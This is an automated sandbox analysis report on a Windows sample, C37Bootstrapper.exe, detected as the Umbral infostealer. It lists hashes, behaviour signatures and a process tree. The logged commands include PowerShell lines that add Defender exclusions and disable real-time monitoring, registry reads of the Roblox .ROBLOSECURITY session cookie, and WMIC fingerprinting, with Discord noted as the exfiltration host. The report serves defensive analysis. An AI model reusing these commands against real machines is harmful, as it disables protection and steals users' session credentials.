Resubmissions
Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
05-06-2024 16:50
Behavioral task
behavioral1
Sample
C37Bootstrapper.exe
Resource
win7-20240508-en
General
-
Target
C37Bootstrapper.exe
-
Size
407KB
-
MD5
2a25b9d935c4fe0a9f85251ecabfd923
-
SHA1
bebbdce90e0ba9eb1cf388f0db17dbb97775e9e2
-
SHA256
b5015182ecaa7561f27090fb7b2aab0decbbffc94606225b12676dc720266498
-
SHA512
08f31d8e8867fcdadb209d28ad3f654b694fe5ec19a289871d758ab75d7759f08c4b8f01c789be22c2e83dafa8ec9e861479003e1e091038074471c701bf9dbf
-
SSDEEP
6144:oloZMLrIkd8g+EtXHkv/iD4I7lXrRiK1AwBzOurZpjb8e1mVi4qkRH:2oZ0L+EP8I7lXrRiK1AwBzOurzr4J
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1580-1-0x0000000000A20000-0x0000000000A8C000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2764 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts C37Bootstrapper.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 discord.com 8 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2820 wmic.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1580 C37Bootstrapper.exe 2764 powershell.exe 2692 powershell.exe 2940 powershell.exe 1032 powershell.exe 2164 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1580 C37Bootstrapper.exe Token: SeIncreaseQuotaPrivilege 2680 wmic.exe Token: SeSecurityPrivilege 2680 wmic.exe Token: SeTakeOwnershipPrivilege 2680 wmic.exe Token: SeLoadDriverPrivilege 2680 wmic.exe Token: SeSystemProfilePrivilege 2680 wmic.exe Token: SeSystemtimePrivilege 2680 wmic.exe Token: SeProfSingleProcessPrivilege 2680 wmic.exe Token: SeIncBasePriorityPrivilege 2680 wmic.exe Token: SeCreatePagefilePrivilege 2680 wmic.exe Token: SeBackupPrivilege 2680 wmic.exe Token: SeRestorePrivilege 2680 wmic.exe Token: SeShutdownPrivilege 2680 wmic.exe Token: SeDebugPrivilege 2680 wmic.exe Token: SeSystemEnvironmentPrivilege 2680 wmic.exe Token: SeRemoteShutdownPrivilege 2680 wmic.exe Token: SeUndockPrivilege 2680 wmic.exe Token: SeManageVolumePrivilege 2680 wmic.exe Token: 33 2680 wmic.exe Token: 34 2680 wmic.exe Token: 35 2680 wmic.exe Token: SeIncreaseQuotaPrivilege 2680 wmic.exe Token: SeSecurityPrivilege 2680 wmic.exe Token: SeTakeOwnershipPrivilege 2680 wmic.exe Token: SeLoadDriverPrivilege 2680 wmic.exe Token: SeSystemProfilePrivilege 2680 wmic.exe Token: SeSystemtimePrivilege 2680 wmic.exe Token: SeProfSingleProcessPrivilege 2680 wmic.exe Token: SeIncBasePriorityPrivilege 2680 wmic.exe Token: SeCreatePagefilePrivilege 2680 wmic.exe Token: SeBackupPrivilege 2680 wmic.exe Token: SeRestorePrivilege 2680 wmic.exe Token: SeShutdownPrivilege 2680 wmic.exe Token: SeDebugPrivilege 2680 wmic.exe Token: SeSystemEnvironmentPrivilege 2680 wmic.exe Token: SeRemoteShutdownPrivilege 2680 wmic.exe Token: SeUndockPrivilege 2680 wmic.exe Token: SeManageVolumePrivilege 2680 wmic.exe Token: 33 2680 wmic.exe Token: 34 2680 wmic.exe Token: 35 2680 wmic.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeIncreaseQuotaPrivilege 1564 wmic.exe Token: SeSecurityPrivilege 1564 wmic.exe Token: SeTakeOwnershipPrivilege 1564 wmic.exe Token: SeLoadDriverPrivilege 1564 wmic.exe Token: SeSystemProfilePrivilege 1564 wmic.exe Token: SeSystemtimePrivilege 1564 wmic.exe Token: SeProfSingleProcessPrivilege 1564 wmic.exe Token: SeIncBasePriorityPrivilege 1564 wmic.exe Token: SeCreatePagefilePrivilege 1564 wmic.exe Token: SeBackupPrivilege 1564 wmic.exe Token: SeRestorePrivilege 1564 wmic.exe Token: SeShutdownPrivilege 1564 wmic.exe Token: SeDebugPrivilege 1564 wmic.exe Token: SeSystemEnvironmentPrivilege 1564 wmic.exe Token: SeRemoteShutdownPrivilege 1564 wmic.exe Token: SeUndockPrivilege 1564 wmic.exe Token: SeManageVolumePrivilege 1564 wmic.exe Token: 33 1564 wmic.exe Token: 34 1564 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 1580 wrote to memory of 2680 1580 C37Bootstrapper.exe 28 PID 1580 wrote to memory of 2680 1580 C37Bootstrapper.exe 28 PID 1580 wrote to memory of 2680 1580 C37Bootstrapper.exe 28 PID 1580 wrote to memory of 2764 1580 C37Bootstrapper.exe 31 PID 1580 wrote to memory of 2764 1580 C37Bootstrapper.exe 31 PID 1580 wrote to memory of 2764 1580 C37Bootstrapper.exe 31 PID 1580 wrote to memory of 2692 1580 C37Bootstrapper.exe 33 PID 1580 wrote to memory of 2692 1580 C37Bootstrapper.exe 33 PID 1580 wrote to memory of 2692 1580 C37Bootstrapper.exe 33 PID 1580 wrote to memory of 2940 1580 C37Bootstrapper.exe 35 PID 1580 wrote to memory of 2940 1580 C37Bootstrapper.exe 35 PID 1580 wrote to memory of 2940 1580 C37Bootstrapper.exe 35 PID 1580 wrote to memory of 1032 1580 C37Bootstrapper.exe 37 PID 1580 wrote to memory of 1032 1580 C37Bootstrapper.exe 37 PID 1580 wrote to memory of 1032 1580 C37Bootstrapper.exe 37 PID 1580 wrote to memory of 1564 1580 C37Bootstrapper.exe 39 PID 1580 wrote to memory of 1564 1580 C37Bootstrapper.exe 39 PID 1580 wrote to memory of 1564 1580 C37Bootstrapper.exe 39 PID 1580 wrote to memory of 1436 1580 C37Bootstrapper.exe 41 PID 1580 wrote to memory of 1436 1580 C37Bootstrapper.exe 41 PID 1580 wrote to memory of 1436 1580 C37Bootstrapper.exe 41 PID 1580 wrote to memory of 276 1580 C37Bootstrapper.exe 43 PID 1580 wrote to memory of 276 1580 C37Bootstrapper.exe 43 PID 1580 wrote to memory of 276 1580 C37Bootstrapper.exe 43 PID 1580 wrote to memory of 2164 1580 C37Bootstrapper.exe 45 PID 1580 wrote to memory of 2164 1580 C37Bootstrapper.exe 45 PID 1580 wrote to memory of 2164 1580 C37Bootstrapper.exe 45 PID 1580 wrote to memory of 2820 1580 C37Bootstrapper.exe 47 PID 1580 wrote to memory of 2820 1580 C37Bootstrapper.exe 47 PID 1580 wrote to memory of 2820 1580 C37Bootstrapper.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1436
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2164
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2820
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7M88HCOK7OWE8BIM874W.temp
Filesize7KB
MD5715d99a300d29002353caf6f3c2d02b3
SHA1d42e755cc713feea511dfcf01fb0524677ea0aba
SHA2566420d85b63fbc25d4ab3d953c1d57db8299c013f2a4c361f169c5ea733236023
SHA51203973e39a7a9b48c190d7a5f3b51a2599e354802d28ed93dec4d235fa38037a59a31c91f9260f5c61152d89ba02d07912bfc1aecb060037d686e5c31cb7c6c96